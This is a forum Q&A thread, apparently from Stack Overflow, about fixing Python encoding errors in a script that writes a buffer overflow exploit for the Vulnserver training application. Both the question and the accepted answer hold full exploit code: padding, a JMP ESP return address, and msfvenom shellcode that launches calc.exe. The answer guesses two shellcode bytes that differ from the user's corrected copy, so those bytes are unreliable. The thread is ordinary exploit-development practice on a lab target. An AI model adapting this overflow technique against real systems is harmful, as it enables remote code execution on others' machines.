# Python script generating file with exploit code - unicodeescape unicode error

Tags: python, file, security, unicode, encoding

I'm writing a script that should generate a file for exploiting the [Vulnserver](http://www.thegreycorner.com/2010/12/introducing-vulnserver.html).

Everything appears to be fine, but then I added the shellcode and now I run into a unicode error (unicodeescape).

```
#!C:\Users\user\AppData\Local\Programs\Python\Python36\python.exe

import sys, struct

file_suffix='shellcode.txt'
buf='.'

buf+='A'*2006 # buffer

#buf+=''*4 #EIP
#buf+=struct.pack('<I', 0x625011AF) # JMP ESP at 625011AF in essfunc.dll
buf+='\xaf\x11\x50\x62'

#buf+='C'*2000 # space for shellcode
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += "\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += "\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += "\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += "\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += "\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += "\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += "\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += "\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += "\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += "\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += "\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += "\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\xab"
buf += "\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += "\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += "\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += "\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

stat_opt='TRUN'

content=stat_opt+' '+buf
f = open(stat_opt+file_suffix,"w")
f.write(content)
f.close()
```

The resulting file is then sent with `ncat` to the vulnserver.

How do I successfully write the file, containing the string defined in the script above (starting with `TRUN .AAAA[...]`), then the value `\xaf\x11\x50\x62`, followed by the shell code?

**edit** Completely forgot the traceback:

```
  File "gen.py", line 16
    buf+="\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2"
        ^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 48-50: truncated \xXX escape
```

**edit2** I want to write the byte codes to the file, represented by the hex values.

**edit3** I re-copied the shell code from `msfvenom` and the single-character hex values are now correct (the script is updated). However I have a new traceback:

```
Traceback (most recent call last):
  File "gen.py", line 38, in <module>
    f.write(content)
  File "C:\Users\user\AppData\Local\Programs\Python\Python36\lib\encodings\cp1252.py", line 19, in encode
    return codecs.charmap_encode(input,self.errors,encoding_table)[0]
UnicodeEncodeError: 'charmap' codec can't encode character '\x83' in position 2038: character maps to <undefined>
```

Comment: Always put in question full error message (Traceback). It can be more usefull than your description.

Comment: what result do you expect - file exactly with text `\xaf\x11\x50\x62` or file with bytes which codes are `\xaf\x11\x50\x62` ?

Comment: I try to run it and you have incorrect codes - evey code need two digits but you have with single digit `\x2` (in first line) and `\xa` in other line. And this makes your problem.

Comment: Sorry, I forgot the traceback. Added it to the post.
I'm expecting the byte codes which are represented by the hex values.

Comment: and you use `stat_opt_str` which doesn't exist in code.

Comment: copy/paste confusion. I'm sorry, updated the post.

Comment: Python treats this as Unicode and try to convert to bytes using `CP1252` which doesn't have chars with some codes. It will be safer if you do everything in bytes using prefix `b` - ie, `buf = b'.'` and write in file with `wb`

Comment: you need to use 'wb' mode for this file: `open('filename', 'wb')`. It doesn't matter on Linux but it looks you're using Windows

Answer (score 1, accepted):

Every hex code need two digits but you have `\x2` at the end of first line - and this makes your problem. I don't know maybe it has to be `\x02`

You have also `\xa` at the end of other line - maybe you need `\x0a`

Python treats this as text in `UNICODE` and tries to convert to bytes using `CP1252` (`Code Page 1252`)

Better use `bytes` - add prefix `b` to all text. And save in file with `wb`

```
buf = b'.'
buf += b'A'*2006 # buffer

buf += b'\xaf\x11\x50\x62' # EIP; JMP ESP at 625011AF in essfunc.dll

#buf+='C'*2000 # space for shellcode
# Generated with: msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += b"\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x02"
buf += b"\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += b"\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += b"\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += b"\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += b"\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += b"\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += b"\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += b"\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += b"\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += b"\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += b"\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += b"\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\x0a"
buf += b"\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += b"\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += b"\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += b"\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

content = b'TRUN '+buf

f = open('TRUNshellcode_test.txt', "wb")
f.write(content)

f.close()
```

Comment: wow. that's interesting. I copy/pasted directly from `msfvenom`'s output and for some reason those two characters were lost along the way! I copied it again and the single character hex codes are gone. But now I have a new traceback. I'll update the post in a second.

Comment: after changing `\x2` into `\x02` and `\xa` into `\x0a` I can save it without errors.

Comment: I've updated my post, including the script and the traceback.

Comment: works perfectly now. thank you for your help and the explanation!